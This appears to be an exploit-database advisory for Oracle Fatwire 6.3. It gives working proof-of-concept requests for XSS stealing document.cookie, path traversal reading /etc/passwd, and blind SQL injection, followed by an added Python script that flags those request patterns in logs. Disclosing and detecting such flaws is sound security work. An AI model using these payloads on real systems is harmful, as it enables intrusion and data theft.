Oracle Fatwire 6.3 – Multiple Vulnerabilities

  • Author: J. Francisco Bolivar
    Date: 2021-07-29
  • Source: https://www.exploit-db.com/exploits/50167/
  • # Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
    # Date: 29/07/2021
    # Exploit Author: J. Francisco Bolivar @Jfran_cbit
    # Vendor Homepage: https://www.oracle.com/index.html
    # Version: 6.3
    # Tested on: CentOS
    
    1. XSS
    
    The adt parameter is vulnerable to XSS:
    
    https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img src="a" onerror=alert(document.cookie);>
    
    2. Path Traversal
    
    https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
    
    3. Blind SQL Injection
    
    POST /cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice HTTP/1.1
    Host: IPaddress
    
    pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX
    
    The vulnerable parameter is: id_ex (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND 3958=3958&command=xxxxxT
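
A log-triage check for the three request shapes reported above, added here as an example (it is not part of the original advisory or of the product's code): it flags requests whose adt, fn or id_ex values look like the ones shown. The sample records are constructed, and treating id_ex as a numeric ID is an assumption based on the value 203 in the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample records (method, request target, form body); not real traffic.
SAMPLE = [
    ("GET", "/cs/Satellite?c=Page&cid=1&pagename=home&adt=%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E", ""),
    ("GET", "/cs/career/getSurvey.jsp?fn=..%2F..%2F..%2Fetc%2Fpasswd", ""),
    ("POST", "/cs/Satellite?cid=1&pagename=x", "pillar_bp=&id_ex=203+AND+3958%3D3958&command=x"),
    ("POST", "/cs/Satellite?cid=1&pagename=x", "pillar_bp=&id_ex=203&command=x"),
    ("GET", "/cs/career/getSurvey.jsp?fn=survey2021.xml", ""),
]

# One rule per parameter named in the advisory: (label, pattern for a suspicious value).
# Assumption: id_ex is a numeric ID, so any non-digit character is suspicious.
RULES = {
    "adt": ("xss", re.compile(r"[<>]|\bon\w+\s*=", re.I)),
    "fn": ("path-traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)|^[\\/]|\x00")),
    "id_ex": ("sqli", re.compile(r"\D")),
}

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(method, target, body=""):
    """Return a list of (label, parameter) findings for one request."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    hits = []
    for name, (label, pattern) in RULES.items():
        for raw in params.get(name, []):
            if pattern.search(fully_decode(raw)):
                hits.append((label, name))
    return hits

if __name__ == "__main__":
    for record in SAMPLE:
        print(record[0], record[1][:60], classify(*record))
```

The POST body is only available to this check if the log source records it (for example a WAF or reverse-proxy audit log); plain access logs normally cover only the first two cases.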